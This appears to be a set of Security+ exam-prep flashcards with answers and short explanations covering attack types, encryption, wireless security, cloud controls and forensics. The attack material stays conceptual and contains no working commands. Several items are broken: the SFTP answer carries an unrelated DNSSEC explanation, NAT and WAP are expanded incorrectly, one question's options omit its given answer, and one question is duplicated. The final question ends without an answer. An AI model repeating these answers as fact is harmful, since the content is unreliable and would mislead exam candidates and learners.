Sec +
What type of attack can exploit the memory area that an application reserves for use on a server? -Integer overflow -Privilege escalation -Directory traversal -Buffer overflow
-Buffer overflow
Which account setting in Active Directory Domain Services (AD DS) domain policies must use an administrator set in order to block a certain number of passwords that a user has already used? -Reuse -Complexity -History -Time of day
-History (An account's password history is governed by the "Enforce password history" policy in Active Directory (AD). The history attribute sets how many previous passwords are blocked.)
An accountant inadvertently and unknowingly introduced a malware to the company network by attaching a compromised Universal Serial Bus (USB) media stick to a workstation. Describe the most comparable attributes of this type of threat actor. (Select all that apply.) []An internal threat []Not capable of developing malware []Paid off significantly []Intent on harming the company
[]An internal threat (An internal or insider threat is one that has been granted permissions on a system or network. The accountant needed permissions to use USB media sticks on the workstation so that the malware can load onto the system.) []Not capable of developing malware (The accountant's primary role is not IT related and is most likely not capable of developing any type of malware.)
What type of strategy is a blackhole? (Select all that apply.) []Isolation []Segmentation []Containment []Data Loss Prevention
[]Containment (Containment is a strategy that controls access to files, data, systems, or networks across points of entry, using isolation or segmentation techniques.) []Isolation (Isolation is the act of disconnecting an entire system or network. Isolation is a malware containment procedure.)
Government intelligence has revealed that a foreign entity is planning to cripple a major company to disrupt the economy. Hybrid warfare tactics are inevitable in this case. Which social platform would a foreign malicious group use to effectively spread inaccurate information quickly among unsuspecting family and friends? (Select all that apply.) []Whatsapp []Facebook []Telegram []Twitter
[]Facebook []Twitter
List the terms that refer to a document that guides investigators to determine priorities and remediation plans by listing the procedures, contacts, and resources available to responders for various incident categories. (Select all that apply.) []Data Loss Prevention []Runbook []Incident Response Plan []Access Control List
[]Runbook (A SOAR system that implements a playbook with a high degree of automation is also referred to as a runbook, although the two terms are used interchangeably.) []Incident Response Plan (Referred to as a playbook, an incident response plan (IRP) guides investigators to determine priorities and remediation plans by listing the procedures, contacts, and resources available to responders for various incident categories.)
At the Windows desktop screen, a user reports a small pop-up window that shows information about a blocked IP (Internet protocol) address before disappearing. The user fears that Internet access dropped. Describe the type of pop-up window the user reported. -A USB connection notification -Wi-Fi disconnection notification -A Windows update notification
-A host-based firewall notification (A host-based firewall application, with rules to block specific IP subnet ranges, or specific port or protocol connections, may be configured by default for user notification when the system enforces a denial rule.)
An attacker evaded antivirus detection in a Linux kernel, as multiple threads attempted to write an object at the same memory location. What type of vulnerability did the attacker use? -A race condition -A buffer overflow -A pointer dereference -An integer overflow
-A race condition (A race condition vulnerability occurs when multiple threads are attempting to write at the same memory location. Race conditions can deploy as an anti-virus evasion technique.)
A hacker used a Man-in-the-Middle (MitM) attack to capture a user's authentication cookie. The attacker disrupted the legitimate user's session and then re-sent the valid cookie to impersonate the user and authenticate to the user's account. What type of attack is this? -A birthday attack -A Man-in-the-Middle (MitM) attack -A downgrade attack -A replay attack
-A replay attack (In a replay attack, the attacker captures some data used to log on or start a session legitimately. The attacker then disrupts the legitimate session and resends the captured data to re-enable the connection.)
Mobile Android operating system (OS) encryption software might allow encryption of which of the following? -RCS -Passwords -MicroSD -SMS
-MicroSD (Micro Secure Digital (MicroSD) is an external media device supported by many Android devices. Built-in and third-party encryption applications on the mobile OS may encrypt these types of removable storage.)
Mobile engineers are designing a phone that can support internal key-pair certificates for authentication and encryption/decryption capabilities for an internal organization or corporation. Which component may the engineers want to include in the design of this phone? -UBG OTG -SEAndroid -Tethering -MicroSD HSM
-MicroSD HSM (Micro Secure Digital (MicroSD) Hardware Security Module (HSM) is designed to store cryptographic keys, such as a key-pair certificate, in a secure manner. It requires no extra drivers or uncommon hardware components to use.)
What protocol alters public IP addresses to private IP addresses and vice versa, in an attempt to protect internal computers from the Internet? -URL Filter -Firewall -NAT -Proxy
-NAT (Network addressing protocol (NAT) translates public IP addresses to private and vice versa. By using the NAT protocol on the firewall, a company can hide assets from the public internet.)
Which of the following is NOT a critical profiling factor when assessing the risk that any one type of threat actor poses to an organization? -Motivation -Intent -Structure -Non-repudiation
-Non-repudiation (Non-repudiation is a term that describes a property of a secure network where a sender cannot deny having sent a message.)
Describe what distinguishes tabletop training from walkthrough training. -Participants demonstrate their chosen course of action -The scenario is more realistic. -Participants describe their course of action, using no computer equipment. -The scenario is from the point of view of the attacker.
-Participants describe their course of action, using no computer equipment. (In tabletop instruction, the facilitator poses a situation and the respondents describe what steps they might take to identify, contain, and eradicate the potential threat. Scenario data are mostly implemented as flashcards and do not require computing equipment.)
A basic dictionary attack includes using which of the following? -Plaintext -Collisions -Man-in-the-middle -Rainbow table
-Plaintext (A dictionary attack is performed when software generates hash values from a dictionary of plaintexts to match with a captured hash to gain access.)
A global corporation assesses risk appetite and how risks in various regions could influence mission-critical operations. They are assessing compliance with local laws and licensing requirements to prevent financial risk or resolve security risks, and changing the risk posture and implementing risk controls to compensate. Conclude what type of assessment the team is performing. -Risk control assessment -Vulnerability assessment -Penetration testing -Site risk assessment
-Risk control assessment (Risk and control self-assessment (RCSA) is the method by which companies evaluate and analyze the operational risks and the efficacy of the controls used to manage them.)
A company desires a basic protocol for email. The owner requested that a local system store and manage email for each user. Compare the various mail protocols and recommend the best solution for the company. -Simple Mail Transfer Protocol -Secure Multipurpose Internet Mail Protocol -Secure Post Office Protocol v3 -Secure Internet Message Access Protocol v4
-Secure Post Office Protocol v3 (Secure Post Office Protocol v3 (POP3) is a mailbox protocol designed to allow mail to be stored on a server and downloaded to the recipient's email client at their convenience.)
A hacker can use Microsoft Office applications as an attack vector to automatically run multiple tasks in the background using which of the following? -PowerShell -ARP poisoning -Bash -VBA
-VBA (Microsoft Office uses the Visual Basic for Applications (VBA) languages to script macros, for example, in a Word document to carry out multiple tasks automatically.)
A healthcare organization was asked to share its data with an analytics company to perform research on patient well-being. Which of the following encryption methods would most likely ensure patient information during analysis? -AES -Ephemeral key -Symmetric -Homomorphic
-Homomorphic (Homomorphic encryption is an encryption method that allows computation to be performed directly on encrypted data without requiring access to a secret key. Analysis can apply functions on encrypted data without needing to reveal the values of the data.)
A company requires a means of managing storage centrally and the ability to share the storage with multiple hosts where users can access data quickly and with little to no latency. Which of the following storage architectures would best meet the company's needs? -RAID -SAN -NAS -Disk
-SAN (A storage area network (SAN) solution provides access to block-level data storage that can be accessed by multiple users. A SAN offers flexibility, availability, and performance to consumers.)
A system administrator moves a file from a server to a client using Secure Shell (SSH) over port 22. Compare the protocols for file transfers to deduce the protocol utilized. -SFTP -FTPES -FTPS -TFTP
-SFTP (Domain Name System Security Extensions (DNSSEC) helps to mitigate against spoofing and poisoning attacks by providing a validation process for DNS responses. The authoritative server for the zone creates a package of resource records, called an RRset, signed with a private key known as the zone signing key.)
A cellular company updates cell towers across the country. They plan to update the baseband of their mobile users, to fully support the new towers. How may the company effectively deploy this new update? -Via USB -Send updates through OTA -Send updates over Wi-Fi -Add to next android version
-Send updates through OTA (OTA (over the air) refers to the process of updating basebands on mobile devices through the cellular network. This option is more effective and efficient and requires very little interaction by the user.)
How might responsibilities be divided among individuals to prevent abuse of power in an organization? -Job rotation -Separation of duties -Clean desk space -Least privilege
-Separation of duties (Separation of duties is a means of establishing checks and balances against the possibility that critical systems or procedures can be compromised by insider threats. Divided duties among individuals prevent ethical conflicts or abuses of power.)
An attacker installed a fraudulent Radio Frequency ID (RFID) reader to steal credit card numbers any time someone used a card to make a purchase. What type of attack does this describe? -Bluesnarfing -Skimming -Bluejacking -Wiphishing
-Skimming (Skimming is an RFID attack where an attacker uses a fraudulent RFID reader to read the signals from a contactless bank card.)
A cyber security team would like to gather information regarding what type of attacks are occurring on a network. Which of the following implementations would assist in routing information on the attackers to a Honeynet? -Spear phishing -DDoS -DNS sinkhole -honeypot
-DNS sinkhole (Domain Name Service (DNS) sinkhole is used to intercept DNS requests attempting to connect to known malicious or unwanted domains and returning a fake IP address.)
A team lead oversees onboarding new system administrators in an IT company. Part of the process is explaining the complex IT infrastructure. Which of the following configuration management strategies would BEST help the team lead explain the infrastructure? -Master Image -Change management -Baseline configuration -Diagrams
-Diagrams (The use of diagrams provides a visual representation of complex relationships between network topologies, workflows, internet protocols, and architecture within a system. Diagrams must be updated as system components change. Baseline configurations are documented and agreed-upon sets of specifications for information systems.)
An unmanned aerial vehicle is equipped with a component to ensure position and movement sensors are aligned and relays information to a ground control. Which of the following computing devices does this best describe? -Microprocessor -Embedded system -SoC -Microcontroller
-Embedded system (An embedded system is a combination of hardware and software that contains a dedicated function and uses a computer component to complete the function.)
A junior pen tester performs a routine reconnaissance audit on a client's network with a black box strategy. Compare and contrast the descriptions and determine which fits the tester's approach. -Testing for a bug bounty -Testing as an unprivileged insider threat -Testing as an external threat -Testing as a privileged insider threat
-Testing as an external threat (In a black box environment, the pen tester is given no privileged information about the network. This type of test is useful for simulating the behavior of an external.)
What is the term describing a point in an investigation during which the suspect cannot deny his involvement? -Provenance -Preservation -Legal hold -Non-repudiation
-Non-repudiation (Establishing a timeline and recording the acquisition process establishes provenance of the evidence to ensure its admissibility. This proof of integrity ensures non-repudiation.)
A consumer uses a Samsung SmartThings coordinator to turn on lights in the home and start the dishwasher. Which communications protocol is the hub using? -Bluetooth -Narrowband -Baseband -Zigbee
-Zigbee (Zigbee is a two-way wireless radio frequency communication between a sensor and a control system. It is an Institute of Electrical and Electronics Engineers (IEEE) 802.15.4-based specification for communication protocols and is used for home automation.)
WPA (Wi-Fi Protected Access) fixes the security problems with WEP (Wired Equivalent Privacy) by adding TKIP (Temporal Key Integrity Protocol) to the RC4 cipher to make it stronger. TKIP fixes the checksum problem, uses a larger Initialization Vector (IV), transmits it as an encrypted hash, and adds a sequence counter to resist replay attacks. What replaced RC4/TKIP to make WPA2 significantly more secure than WPA? -AES/CCMP -SHA-2/IEEE 802.1x -SHA-2/CCMP -AES/IEEE 802.1x
-AES/CCMP (For WPA2, AES (Advanced Encryption Standard) deploys within CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol). AES replaces RC4, and CCMP replaces TKIP. AES is for encryption, and CCMP is for message integrity.)
A Windows firewall rule allows all programs, all protocols, and all ports within a 192.168.0.0/24 subnet to connect to the network. What type of Windows Firewall with Advanced Security is this? -Secure Socket Layer -Access Control List -Transport Layer Security -Data Leak Prevention
-Access Control List
Which failover type does an engineer configure so that all nodes are always on? -Active/passive -Full tunnel -Active/active -Split tunnel
-Active/active (With failover, an active/active cluster means that both nodes are processing connections concurrently. This allows the administrator to use the maximum capacity from the available hardware while all nodes are functional.)
A network administrator sets up a stateless firewall using an open-source application running on a Linux virtual machine. The immediate benefit of this setup is that it was easy to set up quickly with basic rules. What other reasons may have influenced the administrator's decision to deploy a stateless rather than a stateful firewall? (Select all that apply.) -Allow network protocols -Analyze HTML code -Hardware performance -Block TCP ports
-Allow network protocols (A packet filtering firewall may also set rules for protocol ID or type. For example, it may allow HTTPS traffic.) -Block TCP ports (A packet filtering firewall is configured by specifying an access control list (ACL). An ACL may define port filtering or security rules to block, for example, TCP port 3389 which is used for remote desktop protocol.)
In a particular workplace, all user actions are recorded and accounted for. Any time a resource is updated, archived, or a user has their clearance level changed, it must be approved by a root user. Users that leave, arrive, or change jobs (roles) must have their user accounts regularly recertified, and any account changes must be approved by an administrator. What are these measures known as? -Job rotation -Change control -Acceptable use policy -Separation of duties
-Change control (Change control of quality management systems and information technology systems is a process used to ensure that changes to the product or system are implemented in a managed and organized manner.)
Which attack vector makes it possible for a threat actor to compromise a whole platform with just one account? -E-mail -Cloud -Supply chain -Social media
-Cloud (On a cloud platform, an attacker only needs to find one account, service, or host with weak credentials to gain access. The attacker is likely to target the accounts used to develop services in the cloud or manage cloud systems.)
An organization that is planning a move to the cloud checks to see that the chosen CSP uses a standard method for creating and following security competencies. Which method does the CSP likely implement? -Reference architecture -Service Organization Control (SOC2) -Cloud controls matrix -National, territory, or state laws
-Cloud controls matrix (Cloud controls consists of specific controls and assessment guidelines that should be implemented by CSPs. A matrix acts as a starting point for agreements as it provides a baseline level of security competency that the CSP should meet.)
A recent change to an API exposes an exploit in a web application. Developers working on the project discover that dead code in the application had been executed as a result of which practice? -Unreachable code -Normalization code -Code reuse -Code obfuscation
-Code reuse (Code reuse is the copying of code from one location into another. Careless or mismanaged code reuse can introduce instances of dead code.)
Server B requests a secure record exchange from Server A. Server A returns a package along with a public key that verifies the signature. What does this scenario demonstrate? -DNS Spoofing -Dynamic Host Configuration Protocol -DNS Security Extensions -DNS Server Cache Poisoning
-DNS Security Extensions (Domain Name System Security Extensions (DNSSEC) helps to mitigate against spoofing and poisoning attacks. The authoritative server for the zone creates a package of resource records, called an RRset, signed with a private key known as the zone signing key.)
A small department at a company manages a server, separate from IT, for data access and backup purposes. What role does the department fulfill? -Data controller -Data processor -Data owner -Data custodian
-Data custodian (The data custodian role handles managing the system on which the data assets are stored. This includes responsibility for enforcing access control, encryption, and backup/recovery measures.)
A tablet uses a key-based technique for encrypting data. It focuses on a pair of public and private keys for decryption and encryption of web traffic using less power than other encryption methods. Which encryption method is this? -Ephemeral -Asymmetrical -Homomorphic -ECC
-ECC (Elliptic curve cryptography (ECC) is an asymmetric public and private key-based cryptographic technique for encrypting data. ECC generates keys through the properties of the elliptic curve equation providing smaller and more efficient cryptographic key processes.)
A cloud service provider informs its consumers that Amazon Linux version 1 products will no longer be supported after 31 December. Consumers using these products must have a plan in place to upgrade to the newest Amazon Linux product, version 2. After the deadline, Amazon Linux 1 products will only receive critical patches. Which of the following best describes the degradation of the product. -Legacy system -EOL -Multiparty risk -EOS
-EOL (The end of life (EOL) for a software product occurs when a product will no longer be produced or sold. These products are most likely to be replaced by a newer version or model.)
A zone separated from the local network, provides business partners access to company resources without disclosing internal information. What type of zone does this illustrate? -DMZ -Intranet -Extranet -VLAN
-Extranet (An extranet is a zone created to allow authorized users access to company assets separate from the intranet.)
A Cloud Service Provider (CSP) outsources the entire cyber security elements to a third party for the infrastructure in which an application resides due to lack of resources. The CSP maintains responsibility of the environment and attributes. What is this an example of? -Pay as you go -SECaaS -MSSP -Resource pooling
-MSSP (A managed service provider (MSP)/Managed security service provider (MSSP) offers fully outsourced responsibility for information assurance to a third party.)
Which of the following wireless technologies does not provide encryption and is known as a "bump"? -RFID -NFC -IV -Bluetooth
-NFC (Near Field Communication (NFC) is known as a bump, named after an early mobile sharing app. It was later redeveloped as Android Beam. It is commonly used for mobile wallet apps like Google Pay.)
A system administrator applies a Windows patch to the virtual machines (VM) in a virtual desktop infrastructure (VDI). After the patch is complete, the VMs no longer authenticate with the server. Which of the following is the best next step to take for the system administrator? -Execute penetration test. -Complete a vulnerability scan. -Revert to last known good configuration. -Take a snapshot.
-Revert to last known good configuration. (The administrator should revert to the last known good configuration before the patch. The virtual machines (VM) were working before the patch. Reverting to the last known good configuration will get the system back up and running.)
Analyze the methods and determine which a technician uses as a non-persistent recovery method on a server using a system baseline. -Build from a template -Live boot media -Revert to known state -Rollback to known configuration
-Rollback to known configuration (Rollback to known configuration is a mechanism for restoring a baseline system configuration, such as Windows System Restore.)
Cuckoo is a software package that provides a system configuration allowing the system to be completely isolated from its host. It provides a safe environment for potentially dangerous research, such as on malware, while recording file system and registry changes, as well as network activity. What is this type of isolated system called? -Exploitation framework -ARP cache -Vulnerability test -Sandbox
-Sandbox (A sandbox, such as Cuckoo, is an isolated environment created to safely analyze malware and exploits. Sandboxing is an isolation technique commonly used in cybersecurity research, particularly malware research.)
With no specific target in mind, and without a reasonable goal, an attacker launched an unstructured phishing attack with an attachment of a replicating computer worm. If the attacker did not fully understand how this malware worked, and just wanted to gain attention, what classification of threat actor is this person? -Organized crime -Advanced Persistent Threat (APT) -Hacktivist -A script kiddie
-Script Kiddie (A script kiddie uses hacker tools without necessarily understanding how they work or having the ability to craft new attacks. Script kiddie attacks might have no specific target or any reasonable goal, other than gaining attention or proving technical abilities.)
A company provides smartphones to their employees. IT administrators have the ability to deploy, secure, and remove specific applications and data from the employees' smartphones. Analyze the selections and determine how IT can perform this type of control. -Push notifications -Content management -Baseband update -Storage segmentation
-Storage segmentation (Storage segmentation is personal data segmented from organizational data on a mobile device. It gives IT administrators control over corporate assets on employees' mobile devices.)
A company that maintains a classified environment staffs the front entrance with a person to review credentials and a person to verify authorized access. Employees must pass through a faraday cage before being allowed into the classified area. Which type of physical security does this best represent? -Tailgating -Mantrap -Two-person control -Visitor logging
-Two-person control (Two-Person Integrity/Control is the continuous surveillance and control of a controlled environment or material by a minimum of two authorized individuals.)
What can a threat actor use to perform the popular social engineering technique of dropping USB media around a college campus? -UAV -OSINT -Gray box -Van
-UAV (An unmanned aerial vehicle (UAV), or drone, provides a vector a popular social engineering technique that drops infected USB media around college campuses. UAVs are also used for war flying.)
Today's hackers are keen on knowing that security teams are actively hunting for threats on the network. Hackers may use resources to trigger a diversion to keep threat hunters busy, while another attack is initiated to carry out the primary objective of the planned penetration attack. How can a security team best circumvent this strategic hacking technique? -Use a defensive maneuver. -Review security advisories. -Apply intelligence fusion techniques. -Monitor threat feeds from ISACs.
-Use a defensive maneuver. (A defense maneuver uses passive discovery techniques so that threat actors do not know they have been discovered. This gives the security team a chance to investigate the source of the attack and plan a resolution before the threat moves on to the next objective.)
The RADIUS server is down, and employees need immediate access to Wi-Fi routers in the office building. The WAPs (Wireless Access Points) service smartphones and tablets. After disabling Enterprise mode, how will users connect to the WAPs? -Set devices to 802.11n -Use 5 GHz band -Use a pre-shared key -Use company credentials
-Use a pre-shared key (PSK (Pre-shared Key) is the password needed to gain access to a WAP (Wireless Authentication Protocol) that is WPA2 enabled, for example.)
A company with offices in multiple countries deployed a cyber threat intelligence (CTI) appliance in the cloud to detect network attacks. The security team examined last week's data and spent a significant amount of time trying to better predict future attacks and ways to improve security. How can the team take advantage of cloud resources to better analyze these threats? -Use artificial intelligence -Use code repositories -Use OSINT -Use proprietary software
-Use artificial intelligence (Artificial intelligence (AI), especially machine learning, is available with cloud service providers (CSP) such as the Google Cloud Platform. AI can help analyze threat data in real-time to make better predictions, and initiate workflows to stop attacks as they happen.)
An application developer uses a third-party source to send cryptographic data through multiple processors to stretch the data and ensure secure algorithms. What is the developer preventing the use of? -Collision -Weak keys -Salting -Rainbow table attack
-Weak keys (Weak keys are poor or short algorithms in cryptographic keys used with a specific cipher. They are vulnerable to cybersecurity attacks. Stretching keys can strengthen the algorithm to make it more secure.)
A systems administrator learns Linux commands to view log files. Which command should be used if line numbers are required to view an entire file? -tail -head -grep -cat
-cat (The Linux command cat allows for viewing the entire contents of one or more files. For example, to view the contents of two log files, use cat -n access.log access2.log. The -n switch adds line numbers.)
Companies often update their website links to redirect users to new web pages that may feature a new promotion or to transition to a new web experience. How would an attacker take advantage of these common operations to lead users to fake versions of the website? (Select all that apply.) []Ruin the company's reputation with reviews. []Hijack the website's domain. []Add redirects to .htaccess files. []Craft phishing links in email.
[]Add redirects to .htaccess files. (The .htaccess file controls high-level configuration of a website. This file runs on an Apache server and can be edited to redirect users to other URLs.) []Craft phishing links in email. (An attacker can craft a phishing link that might appear legitimate to a naïve user, such as: https://trusted.foo/login.php?url="https://tru5ted.foo".)
Failed logins or instances of denial of access to restricted files may be indicators of compromise. Suggest where records of such incidents might be found. (Select all that apply.) []DNS cache []Dump files []Authentication logs []Security logs
[]Authentication logs (Even though investigating every security and network log manually would take forever, by comparing irregularities in authentication logs (such as incomplete authentication), investigators can correlate corresponding entries.) []Security logs (Windows system and security logs can provide insight on certain events, providing a timeline with who may have logged on or tried to log on to the system.)
Which boot integrity concepts utilize the trusted platform module (TPM)? (Select all that apply.) []Boot attestation []Secure Boot []Measured boot []UEFI
[]Boot attestation (Boot attestation is the capability to transmit a boot log report signed by the TPM via a trusted process to a remote server, such as a network access control server.) []Measured boot (A trusted or measured boot process uses platform configuration registers (PCRs) in the TPM at each stage in the boot process to check whether hashes of key system state data have changed.)
Choose the components a threat actor may use to set up a distributed denial of service attack (DDoS) on a local network. (Select all that apply.) []Spyware []Botnet []Remote access trojan []Command and control
[]Botnet (A botnet is a group of bots that are all under the control of the same malware instance. A bot is an automated script or tool that performs some malicious activity.) []Remote access trojan (A remote access trojan (RAT) is backdoor malware that mimics the functionality of legitimate remote control programs but is designed specifically to operate covertly.) []Command and control (A command and control (C2 or C&C) host or network controls the bots or botnet to carry out remote tasks on the local network.)
Identify types of metadata that would be associated with CDR (call detail records) of mobile devices. (Select all that apply.) []GPS location data []Call durations []List of towers connected to []SMS text timestamps
[]Call durations (Call detail records (CDR) routinely contain times and durations of incoming, outgoing, and attempted calls, as well as the phone numbers of said calls.) []List of towers connected to (By examining the list of towers a device has connected to in the call detail records (CDR), it is possible to ascertain the general vicinity of locations in which the device has been present.) []SMS text timestamps (SMS text time, duration, and phone number of origin are recorded in the call detail records (CDR) metadata associated with mobile devices.)
Which certificate attribute describes the computer or machine it belongs to? (Select all that apply.) []Common name []Subject alternate name []Certificate authority name []Company name
[]Common name (The common name (CN) attribute identifies the computer or machine by name, usually a fully qualified domain name (FQDN), such as www.comptia.org.) []Subject alternate name (The subject alternate name (SAN) extension field is structured to represent different types of identifiers, including domain names. This is more commonly used as the CN attribute has been deprecated.)
Investigators perform analysis on a breached system. When looking at data timestamps, what should be noted about any time offset? (Select all that apply.) []Clock synchronization []Daylight savings time []Valid time source []UTC time
[]Daylight savings time (The local time offset on a system may vary if daylight savings time is in place. Investigators must note the offset between the local system time and UTC.) []UTC time (Local time is the time within a particular time zone, which is offset from UTC by several hours. NTFS uses UTC "internally." It is vital to establish how a timestamp is calculated and note the offset.)
While designing a new wireless system for deployment, an engineer utilizes the newest security technology available. Analyze the security properties and conclude which will be used. (Select all that apply.) []Enterprise authentication methods must use 192-bit AES, while personal authentication can use either 128-bit or 192-bit []RC4 stream cipher using Temporal Key Integrity Protocol (TKIP) to make it stronger []Advanced Encryption Standard (AES) cipher with 128-bit keys []4-way handshake authentication mechanism with a protocol based on the Diffie-Hellman key agreement
[]Enterprise authentication methods must use 192-bit AES, while personal authentication can use either 128-bit or 192-bit (AES CCMP in earlier WPA implementations is replaced in WPA3 with the AES Galois Counter Mode Protocol (GCMP) mode of operation. Enterprise authentication methods must use 192-bit AES, while personal authentication can use either 128-bit or 192-bit.) []4-way handshake authentication mechanism with a protocol based on the Diffie-Hellman key agreement (Simultaneous Authentication of Equals (SAE) in WPA3 uses a 4-way handshake authentication and association mechanism with a protocol based on the Diffie-Hellman key agreement.)
A group of junior systems administrators participates in an ethical hacking seminar that allows for advancement and rewards for completing challenges. Which training methods do the administrators experience? []Gamification []Phishing simulations []Capture the flag []Role-based training
[]Gamification (Gamification is a learning approach that includes a fun-factor and features gaming type elements such as points, leveling up, and rewards.) []Capture the flag (Ethical hacker training programs and gamified competitions usually use Capture the Flag (CTF). Participants must complete a series of challenges that usually result in identifying a threat actor (the flag).)
Select the tools that do any form of network scanning, such as port scanning, IP scanning, etc. (Select all that apply.) []Netcat []Nmap []cat []ping
[]Netcat (The nc (or Netcat) command reads and writes data across network connections. Netcat can be used for things such as port scanning and fingerprinting.) []Nmap (Nmap is a versatile tool, allowing users to perform various types of network scans. The packet-sniffing library Npcap can be added to Nmap to provide packet sniffing and injection capability.) []ping (Ping can execute a sweep of all the IP addresses in a subnet with just a short script.)
An attacker used a dumpster trunk to pick up trash at the home of a successful Chief Executive Officer (CEO). What information gathering techniques is the attacker NOT using in this case? (Select all that apply.) []Network reconnaissance []Credential harvesting []Dumpster diving []Impersonation
[]Network reconnaissance (Network reconnaissance involves using tools such as nmap or network mapper to gather information about network devices and computer services.) []Credential harvesting (Credential harvesting is a campaign specifically designed to steal account credentials, usually to sell them in the black market. This is commonly aimed at a larger target pool.)
Which of the following is TRUE about a certificate authority (CA) in a hierarchical model as opposed to a single CA model? (Select all that apply.) []PKI collapses if CA is compromised. []Offline CA is a best practice. []Root certificate is self-signed. []Intermediate CA issue certificates.
[]Offline CA is a best practice. (Powering off the root certificate authority (CA) in a hierarchical public key infrastructure (PKI) model is a security best practice. The root CA is a high-security risk and has the potential to compromise all subordinate certificates if not powered off.) []Intermediate CA issue certificates. (The intermediate CA is a hierarchical PKI that creates and issues certificates to users. Intermediate CAs can balance their work based on areas of responsibility.)
A start-up company operates all of its web servers and services on a cloud platform using Platform as a Service (PaaS). The company offices run a local domain controller for directory services. Which type of attacks would the cloud service provider consider as cloud-based attacks as opposed to on-premise? (Select all that apply.) []Plaintext API keys in database []RAT on web servers []Backdoor to virtual platforms []Accessible USB ports for flash media
[]RAT on web servers (A remote access trojan (RAT) is backdoor malware that mimics the functionality of legitimate remote control programs but is designed specifically to operate covertly.) []Backdoor to virtual platforms (A backdoor is any type of access method to a host that circumvents the usual authentication method and gives the remote user administrative control.)
Where might one find operating system files during acquisition? (Select all that apply.) []Random-access memory (RAM) []Firmware []Cache []Pagefile
[]Random-access memory (RAM) (Operating system files active during acquisition may be present in the random-access memory (RAM).) []Cache (System caches are a place likely to contain operating system files. Some of these may be relevant to the investigation.) []Pagefile (Operating system files active during acquisition may be present in the pagefile or swap.)
A new administrator completed setting up an admin account on the network. The admin successfully logged on to a remote file server with the new credentials but not on a remote domain controller (DC) server. Determine the most likely cause for not being able to log in to a DC server. -Disabled account -Account audit -Account permission -Access policy
-Access policy (Access policies determine things such as the right to log on to a computer locally or via remote desktop, install software, change the network configuration, and so on.)
An IT department implements a software tool between the company's network and the cloud provider to monitor network traffic and enforce security policies. What software tool was implemented? -CASB -Protocol analyzer -Firewall -SSL/TLS accelerator
-CASB (A Cloud access security broker (CASB) is a tool that is placed between an organization's resources and a cloud service provider that enforces defined security-based policies while monitoring traffic.)
A mobile phone user smiles at the screen of the phone to unlock it for use. Which authentication method is being used? -Behavioral biometrics -Facial recognition -Retina scanner -Keystroke dynamics
-Facial recognition (Facial recognition is a biometric authentication method in which a user registers a physical characteristic with an authentication system and uses the characteristic to authorize access. Facial recognition can include several facial features.)
A social engineer used a phishing attack to trick users into visiting a website. Once users visit the site, a vulnerability exploit kit installs, which actively exploits vulnerabilities on the client. What type of attack did the users become a victim of? -HTTP Response Splitting -Cross-site Request Forgery (XSRF) -Locally Shared Objects (LSOs) -A Man-in-the-Browser (MitB) attack
-A Man-in-the-Browser (MitB) attack (A MitB attack compromises the web browser by installing malicious plug-ins, scripts, or intercepting API calls. Vulnerability exploit kits installed on a website can actively try to exploit vulnerabilities in clients browsing the site.)
A developer implements a single sign-on (SSO) login standard using Security Assertion Markup Language (SAML) for logging users into an application to eliminate the need for username/password credentials. This implementation is part of which of the following? -URL filtering -HTTPS -API consideration -SSL/TLS
-API consideration (API considerations are programming code that enables data transmission between one software product to another. It also contains the terms of this data exchange.)
A new administrator completed setting up an admin account on the network. The admin successfully logged on to a remote file server with the new credentials but not on a remote domain controller (DC) server. Determine the most likely cause for not being able to log in to a DC server. -Account audit -Access policy -Disabled account -Account permission
-Access policy (Access policies determine things such as the right to log on to a computer locally or via remote desktop, install software, change the network configuration, and so on.)
An attacker caused a software program to calculate a value that exceeded the fixed lower and upper bounds, and caused a positive number to become a negative number. What vulnerability did the attacker exploit? -A pointer dereference -An integer overflow -A race condition -A buffer overflow
-An integer overflow (An integer overflow attack causes the target software to calculate a value that exceeds the upper and lower bounds. This may cause a positive number to become negative.)
An attacker came within close proximity of a victim and sent the mobile device user spam of an unsolicited text message. Once the user clicked the link in the message, Trojan malware infected the user's device. What type of attack did the hacker most likely infect the mobile user with? -Bluesnarfing -Skimming -WiPhishing -Bluejacking
-Bluejacking (A Bluetooth-discoverable device is vulnerable to bluejacking, similar to spam, where someone sends an unsolicited text (or picture/video) message or vCard (contact details). This can also be a vector for Trojan malware.)
A network engineer is plugging in new patch cables and wants to prevent inadvertent disruptions to the network while doing so. What will the engineer prevent if a Spanning Tree Protocol (STP) is configured on the switches? -MAC floods -Broadcast storms -DHCP spoofing -Signature-based intrusion
-Broadcast storms (A Spanning Tree Protocol (STP) is a means for bridges to organize themselves into a hierarchy and prevent loops from forming. These loops have the potential for broadcasting multiple times creating a storm.)
Which control types does a systems engineer implement when an initial locking mechanism does not perform as expected? (Select all that apply.) -Detective -Compensating -Preventative -Corrective
-Compensating (A compensating control serves as a substitute for a principal control, as recommended by a security standard, and affords the same (or better) level of protection.) -Preventative (A preventive control acts to eliminate or reduce the likelihood that an attack can succeed. It operates before an attack can take place. An example of this control type is a lock.)
An IT company purchases a commercial off the shelf (COTS) product that allows for four developers to access and run the product against developed code for vulnerability and threat assessments. An IT audit indicates that five developers have accessed the product. Which of the following best describes what the company is in violation of? -Vendor diversity -Terms of agreement -Regulatory framework -Compliance/Licensing
-Compliance/Licensing (Software compliance and licensing is a legally binding agreement that means only using a software in accordance with the software developers' conditions of usage.)
Which principle of social engineering can a threat actor use to get many people to act as others would? -Consensus -Trust -Scarcity -Liking
-Consensus (The principle of consensus or social proof refers to techniques that cause many people to act just as others would without force. The attacker can use this instinct to persuade the target that to refuse a request would be odd.)
A company implements automated tools and processes to increase the visibility and transparency of network activity to mitigate the risk of cyber-attacks and detect application performance issues. Which of the following did the company implement? -Continuous integration -Continuous monitoring -Continuous deployment -Continuous delivery
-Continuous monitoring (Continuous monitoring is the process used to detect compliance and risk issues associated with an organization in real-time. Continuous monitoring allows an organization the ability to react to issues swiftly.)
Which classification of data is likely to be immediately escalated in the case of a breach? -Personally identifiable information (PII) -Non-PII customer data -Public data -Critical data
-Critical data (Critical data, sometimes top-secret, is too valuable to permit any risk of a breach. Therefore, any detected abnormality should immediately be escalated to senior decision-makers.)
A database export allows personally identifiable information (PII) to display in report format and on screen. This poses a potential data leakage concern. In order to protect this PII, what de-identification method should the programmer consider implementing? -Hashing -Data masking -Tokenization -Salting
-Data masking (Data masking is a secure coding technique used to hide sensitive or private data from disclosure. All or part of the data fields are altered by substituting character strings with a random character.)
What does the process of carving refer to? -Strategic counterintelligence -Non-repudiation -Acquiring evidence according to order of volatility -Data recovery
